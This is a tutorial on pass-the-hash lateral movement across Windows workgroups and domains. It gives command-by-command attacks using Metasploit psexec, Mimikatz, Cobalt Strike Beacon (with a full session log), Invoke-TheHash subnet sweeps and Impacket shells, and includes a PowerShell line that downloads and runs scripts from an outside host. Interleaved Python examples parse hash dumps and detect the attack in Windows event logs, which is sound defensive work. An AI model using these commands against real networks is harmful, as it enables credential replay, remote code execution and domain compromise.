Lateral Movement Within a Domain

Introduction to PTH

Pass the Hash, also called a hash-passing attack and abbreviated PTH, lets an attacker authenticate as a user without that user's plaintext password: the captured hash is used directly to log on to the target system. This works because the NTLM challenge-response protocol proves possession of the NT hash rather than of the password, so the hash is itself the credential.

The preconditions for a successful attack are:

  • Port 445 is open and the SMB service is reachable
  • The admin$ share is enabled

Metasploit psexec Module

Obtaining the Hash

Run hashdump in the Meterpreter session that was obtained to get the user hash values:

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
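The dump above is in pwdump format, user:RID:LM-hash:NT-hash:::. Two values in it are worth recognising on sight: aad3b435b51404eeaad3b435b51404ee is the LM field when no LM hash is stored, and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password. The following Python is an added example, not code from the original post or from Metasploit; it parses dumps in this format and reports what a defender reviewing them wants to know: accounts with blank passwords, accounts that still store a legacy LM hash, and the same NT hash for a local account reused across several hosts, which is exactly the condition that lets one captured hash move laterally. The sample dumps are constructed.

```python
"""Parse pwdump-format hashdump output and flag the conditions that make
pass-the-hash lateral movement easy. Added example; sample dumps are constructed."""
import re
from collections import defaultdict

# Well-known values: LM field when no LM hash is stored, NT hash of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)


def parse_pwdump_line(line):
    """Return a record dict for one user:RID:LM:NT::: line, or None if malformed."""
    m = PWDUMP_RE.match(line.strip())
    if not m:
        return None
    return {
        "user": m["user"],
        "rid": int(m["rid"]),
        "lm": m["lm"].lower(),
        "nt": m["nt"].lower(),
    }


def parse_dump(text):
    """Parse a whole dump, skipping lines that are not pwdump records."""
    records = (parse_pwdump_line(line) for line in text.splitlines())
    return [r for r in records if r is not None]


def blank_password_accounts(records):
    """Accounts whose NT hash is the hash of the empty string."""
    return [r["user"] for r in records if r["nt"] == EMPTY_NT]


def legacy_lm_accounts(records):
    """Accounts that still store a real LM hash (LM storage should be disabled)."""
    return [r["user"] for r in records if r["lm"] != EMPTY_LM]


def shared_nt_hashes(dumps):
    """dumps maps hostname -> dump text. Returns {nt_hash: [(host, user), ...]}
    for every non-empty NT hash that appears on more than one host: the same
    local password on several machines is what a captured hash can be replayed to."""
    seen = defaultdict(list)
    for host, text in dumps.items():
        for r in parse_dump(text):
            if r["nt"] != EMPTY_NT:
                seen[r["nt"]].append((host, r["user"]))
    return {h: sorted(v) for h, v in seen.items()
            if len({host for host, _ in v}) > 1}


# Constructed sample: the same Administrator hash on two hosts, a blank Guest
# password, and one account on WEB that still carries an LM hash.
SAMPLE_DUMPS = {
    "PC": "\n".join([
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0:::",
        "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    ]),
    "WEB": "\n".join([
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0:::",
        "websvc:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::",
        "[*] not a record line",
    ]),
}

if __name__ == "__main__":
    for host, text in SAMPLE_DUMPS.items():
        recs = parse_dump(text)
        print(host, "blank:", blank_password_accounts(recs), "lm:", legacy_lm_accounts(recs))
    for h, where in shared_nt_hashes(SAMPLE_DUMPS).items():
        print("NT hash", h, "reused on", where)
```

Feeding the output of several hosts' dumps into shared_nt_hashes is the quickest way to measure how far one compromised local administrator password would carry; unique local administrator passwords (for example via LAPS) are the mitigation that empties that result.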

The PTH module used next is Metasploit's exploit/windows/smb/psexec.

Workgroup

  • Add a route
sessions 1
run autoroute -s 10.10.10.1/24
run autoroute -p


  • Use the psexec module

Because the target sits on the internal network, use a bind (forward-connect) shell payload to obtain a shell session on the internal target host:

msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set rhosts 10.10.10.20
msf6 exploit(windows/smb/psexec) > set smbuser administrator
msf6 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set lport 51234
msf6 exploit(windows/smb/psexec) > run


Domain Environment

  • Obtain the domain user's hash; the NTLM hash obtained is:

e318a05a844086852b42d47e60ee2b1c
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts 10.10.10.10
msf5 exploit(windows/smb/psexec) > set smbdomain kc.local
msf5 exploit(windows/smb/psexec) > set smbuser lisi
msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:e318a05a844086852b42d47e60ee2b1c
msf5 exploit(windows/smb/psexec) > run

Mimikatz Pass-the-Hash Attack

Once we have the NTLM hash of a host in the internal network, we can use mimikatz to perform a pass-the-hash attack against that host; when the command succeeds, a cmd window is spawned:

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:10.10.10.20 /ntlm:45a524862326cb9e7d85af4017a000f0" exit

From that cmd window we can connect directly to the host and, for example, list its directory contents:

net use \\10.10.10.20\c$
dir \\10.10.10.20\c$
copy 1.exe \\10.10.10.20\c$
net use h: \\10.10.10.20\c$

CobaltStrike Pass-the-Hash Attack

Obtaining the Hash

After obtaining a Beacon session, running commands such as hashdump or logonpasswords yields the user hashes on the current host.

Workgroup

The operations above actually run the following commands in the selected Beacon session:

rev2self
#Revert to the original token

pth PC\Administrator 45a524862326cb9e7d85af4017a000f0
#Perform PTH using mimikatz
#mimikatz's sekurlsa::pth /user:Administrator /domain:PC /ntlm:45a524862326cb9e7d85af4017a000f0 /run:"%COMSPEC% /c echo 55d23cd5b3e > \\.\pipe\2f6960"

jump psexec WEB 42585
#Generate the payload for windows/beacon_bind_tcp (0.0.0.0:42585) (\\WEB\ADMIN$\403121c.exe) and upload it to the WEB host
#Create and start service 403121c on the WEB host via the Service Control Manager to run the payload
[01/30 01:38:21] beacon> rev2self
[01/30 01:38:21] [*] Tasked beacon to revert token
[01/30 01:38:21] beacon> pth PC\Administrator 45a524862326cb9e7d85af4017a000f0
[01/30 01:38:21] [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:PC /ntlm:45a524862326cb9e7d85af4017a000f0 /run:"%COMSPEC% /c echo 55d23cd5b3e > \\.\pipe\2f6960" command
[01/30 01:38:21] beacon> jump psexec WEB 42585
[01/30 01:38:21] [*] Tasked beacon to run windows/beacon_bind_tcp (0.0.0.0:42585) on WEB via Service Control Manager (\\WEB\ADMIN$\403121c.exe)
[01/30 01:38:23] [+] host called home, sent: 591778 bytes
[01/30 01:38:28] [+] Impersonated PC\Administrator
[01/30 01:38:28] [+] received output:
Started service 403121c on WEB
[01/30 01:38:28] [+] established link to child beacon: 10.10.10.20
[01/30 01:38:28] [+] received output:
user : Administrator
domain : PC
program : C:\Windows\system32\cmd.exe /c echo 55d23cd5b3e > \\.\pipe\2f6960
impers. : no
NTLM : 45a524862326cb9e7d85af4017a000f0
| PID 1824
| TID 4024
| LSA Process is now R/W
| LUID 0 ; 55498536 (00000000:034ed728)
\_ msv1_0 - data copy @ 00000000018EFED0 : OK !
\_ kerberos -
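What the Beacon output above leaves behind on the target is visible in the Windows event logs: a network logon over NTLM (Security event 4624, logon type 3), a write to the ADMIN$ share (Security event 5145), and a new service installed through the Service Control Manager (System event 7045). The first two of these also appear for the Mimikatz net use and copy commands shown earlier. The following Python is an added example, not code from the original post or from Cobalt Strike; it correlates these events per host within a short window and raises one alert per suspicious service install. The event records are constructed, using the field names Windows writes for these event IDs (Computer, LogonType, AuthenticationPackageName, IpAddress, ShareName, ServiceName, ImagePath).

```python
"""Correlate Windows events into the psexec-style lateral movement pattern:
NTLM network logon (4624) + admin share write (5145) + service install (7045)
on one host within a short window. Added example with constructed records."""
from datetime import datetime, timedelta

ADMIN_SHARES = {"\\\\*\\ADMIN$", "\\\\*\\C$"}
HEX_DIGITS = set("0123456789abcdefABCDEF")


def _ts(rec):
    """Parse the ISO-8601 TimeCreated field into an aware datetime."""
    return datetime.fromisoformat(rec["TimeCreated"].replace("Z", "+00:00"))


def looks_random(name):
    """True when a service or binary name is just hex digits (e.g. 403121c.exe)."""
    stem = name.rsplit("\\", 1)[-1].split(".")[0]
    return len(stem) >= 6 and all(c in HEX_DIGITS for c in stem)


def correlate_psexec(events, window_s=60):
    """Return one alert per 7045 service install that was preceded, within
    window_s seconds on the same host, by an NTLM network logon. A write to
    ADMIN$/C$ from the same source IP or a hex-only service name raises severity."""
    alerts = []
    by_host = {}
    for e in events:
        by_host.setdefault(e["Computer"], []).append(e)
    for host, evs in by_host.items():
        evs.sort(key=_ts)
        for svc in (e for e in evs if e["EventID"] == 7045):
            t_end = _ts(svc)
            t_start = t_end - timedelta(seconds=window_s)
            in_window = [e for e in evs if t_start <= _ts(e) <= t_end]
            logons = [e for e in in_window if e["EventID"] == 4624
                      and e.get("LogonType") == 3
                      and e.get("AuthenticationPackageName") == "NTLM"]
            if not logons:
                continue
            logon = logons[-1]  # most recent NTLM network logon before the install
            share_writes = [e for e in in_window if e["EventID"] == 5145
                            and e.get("ShareName") in ADMIN_SHARES
                            and e.get("IpAddress") == logon["IpAddress"]]
            suspicious_name = looks_random(svc["ServiceName"]) or looks_random(svc["ImagePath"])
            alerts.append({
                "host": host,
                "source_ip": logon["IpAddress"],
                "user": logon["TargetDomainName"] + "\\" + logon["TargetUserName"],
                "service": svc["ServiceName"],
                "image": svc["ImagePath"],
                "severity": "high" if (share_writes or suspicious_name) else "medium",
            })
    return alerts


# Constructed records: the sequence from the Beacon log on WEB, plus a benign
# Kerberos logon followed by a routine agent install on another host.
SAMPLE_EVENTS = [
    {"TimeCreated": "2024-01-30T01:38:21Z", "Computer": "WEB", "EventID": 4624,
     "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "Administrator", "TargetDomainName": "PC", "IpAddress": "10.10.10.30"},
    {"TimeCreated": "2024-01-30T01:38:22Z", "Computer": "WEB", "EventID": 5145,
     "ShareName": "\\\\*\\ADMIN$", "RelativeTargetName": "403121c.exe",
     "AccessMask": "0x2", "IpAddress": "10.10.10.30"},
    {"TimeCreated": "2024-01-30T01:38:23Z", "Computer": "WEB", "EventID": 7045,
     "ServiceName": "403121c", "ImagePath": "\\\\WEB\\ADMIN$\\403121c.exe"},
    {"TimeCreated": "2024-01-30T09:00:00Z", "Computer": "FILE01", "EventID": 4624,
     "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "svc_deploy", "TargetDomainName": "KC", "IpAddress": "10.10.10.5"},
    {"TimeCreated": "2024-01-30T09:00:30Z", "Computer": "FILE01", "EventID": 7045,
     "ServiceName": "Sysmon64", "ImagePath": "C:\\Windows\\Sysmon64.exe"},
]

if __name__ == "__main__":
    for alert in correlate_psexec(SAMPLE_EVENTS):
        print(alert)
```

The NTLM filter is what separates the FILE01 install from the WEB one: a hash can only be passed where NTLM is accepted, so a Kerberos-authenticated session followed by a service install is ordinary administration, while the same sequence over NTLM from an address that also wrote to ADMIN$ is the pattern above. Logging 5145 requires the "Detailed File Share" audit subcategory to be enabled; without it the correlation still fires, at medium severity.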

Domain Environment

  • Obtain the domain user's hash

We obtain the NTLM hash of user lisi in the kc domain and find that this is a domain administrator account.

  • Use psexec to obtain a Beacon session on the domain controller

Run net view to locate the IP address of the DC: 10.10.10.10

PowerShell Pass-the-Hash Attack

Using a known administrator hash, try it against every machine in a specified subnet; this method works in both workgroup and domain environments.

Both Invoke-WMIExec.ps1 and Invoke-TheHash.ps1 must be loaded:

https://github.com/Kevin-Robertson/Invoke-TheHash

  • Load the scripts (from local files, or downloaded in memory)
powershell -exec bypass

Import-Module .\Invoke-WMIExec.ps1
Import-Module .\Invoke-TheHash.ps1
powershell -exec bypass

IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.86:8000/Invoke-WMIExec.ps1');
IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.86:8000/Invoke-TheHash.ps1');
Invoke-TheHash -Type WMIExec -Target 192.168.1.0/24 -Username administrator -Hash 579110c49145015c47ecd267657d3174
  • Use an existing administrator hash to sweep the machines in a specified subnet
Workgroup:
PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 192.168.1.0/24 -Username administrator -Hash b4e535a9bb56bcc084602062c9e2a9d4

Domain:
PS C:\Users\Administrator> Invoke-TheHash -Type WMIExec -Target 10.10.10.0/24 -Domain kc -Username administrator -Hash e1c61709dffcf154ac9d77b5024f6d10
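A sweep like the one above leaves a distinctive trail: one source address and one account producing NTLM network logons, successful or not, against many hosts within seconds. The following Python is an added example, not code from the original post or from Invoke-TheHash; it assumes Security events 4624 and 4625 are forwarded from every host to a central collector, groups them by source IP and account, and reports each pair that reached at least a threshold number of distinct hosts inside a sliding window. The records are constructed and use the Windows field names for these events.

```python
"""Detect a subnet-wide pass-the-hash sweep from centrally collected 4624/4625
events: one source address and account authenticating over NTLM to many distinct
hosts in a short window. Added example with constructed records."""
from collections import defaultdict
from datetime import datetime, timedelta


def _ts(rec):
    """Parse the ISO-8601 TimeCreated field into an aware datetime."""
    return datetime.fromisoformat(rec["TimeCreated"].replace("Z", "+00:00"))


def detect_ntlm_sweep(events, min_targets=3, window_s=120):
    """Group NTLM network logons (successes and failures) by (source IP, account),
    slide a window over each group, and report groups that reached at least
    min_targets distinct hosts inside one window. Failures count too: a hash that
    is only valid on some hosts still produces a 4625 on all the others."""
    groups = defaultdict(list)
    for e in events:
        if e["EventID"] not in (4624, 4625):
            continue
        if e.get("LogonType") != 3 or e.get("AuthenticationPackageName") != "NTLM":
            continue
        key = (e["IpAddress"], e["TargetUserName"].lower())
        groups[key].append((_ts(e), e["Computer"], e["EventID"]))

    findings = []
    span = timedelta(seconds=window_s)
    for (ip, user), hits in groups.items():
        hits.sort()
        best = set()
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > span:
                start += 1
            hosts = {h for _, h, _ in hits[start:end + 1]}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= min_targets:
            findings.append({
                "source_ip": ip,
                "user": user,
                "targets": sorted(best),
                "succeeded_on": sorted({h for _, h, eid in hits if eid == 4624}),
            })
    return findings


def _ev(t, computer, eid, user, ip, pkg="NTLM"):
    """Build a minimal constructed 4624/4625 record (Computer is the target host)."""
    return {"TimeCreated": t, "Computer": computer, "EventID": eid, "LogonType": 3,
            "AuthenticationPackageName": pkg, "TargetUserName": user, "IpAddress": ip}


SAMPLE_EVENTS = [
    # Sweep: one hash tried from 10.10.10.30 against four hosts in 15 seconds.
    _ev("2024-01-30T02:10:00Z", "DC",   4624, "administrator", "10.10.10.30"),
    _ev("2024-01-30T02:10:03Z", "FS01", 4625, "administrator", "10.10.10.30"),
    _ev("2024-01-30T02:10:07Z", "WEB",  4624, "administrator", "10.10.10.30"),
    _ev("2024-01-30T02:10:15Z", "PC",   4624, "administrator", "10.10.10.30"),
    # Normal: a user reaching three servers over Kerberos is not NTLM and is ignored.
    _ev("2024-01-30T02:11:00Z", "DC",   4624, "jdoe", "10.10.10.5", pkg="Kerberos"),
    _ev("2024-01-30T02:11:05Z", "FS01", 4624, "jdoe", "10.10.10.5", pkg="Kerberos"),
    _ev("2024-01-30T02:11:09Z", "WEB",  4624, "jdoe", "10.10.10.5", pkg="Kerberos"),
    # Below threshold: a backup account using NTLM against two hosts.
    _ev("2024-01-30T02:12:00Z", "FS01", 4624, "backup", "10.10.10.40"),
    _ev("2024-01-30T02:12:30Z", "WEB",  4624, "backup", "10.10.10.40"),
    # Same account hours later: outside the window, so not merged into the burst.
    _ev("2024-01-30T05:00:00Z", "DC",   4624, "administrator", "10.10.10.30"),
]

if __name__ == "__main__":
    for finding in detect_ntlm_sweep(SAMPLE_EVENTS):
        print(finding)
```

The threshold and window need tuning per environment: vulnerability scanners and monitoring systems legitimately authenticate to many hosts and should be allow-listed by source address rather than by raising min_targets for everyone. The succeeded_on list is the useful part of a finding during response, since it names the hosts where the passed hash was actually valid.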

Impacket Pass-the-Hash Attack

Command execution:
wmiexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0 administrator@10.10.10.20 "whoami"

Get a shell:
smbexec.exe -hashes aad3b435b51404eeaad3b435b51404ee:45a524862326cb9e7d85af4017a000f0 administrator@10.10.10.20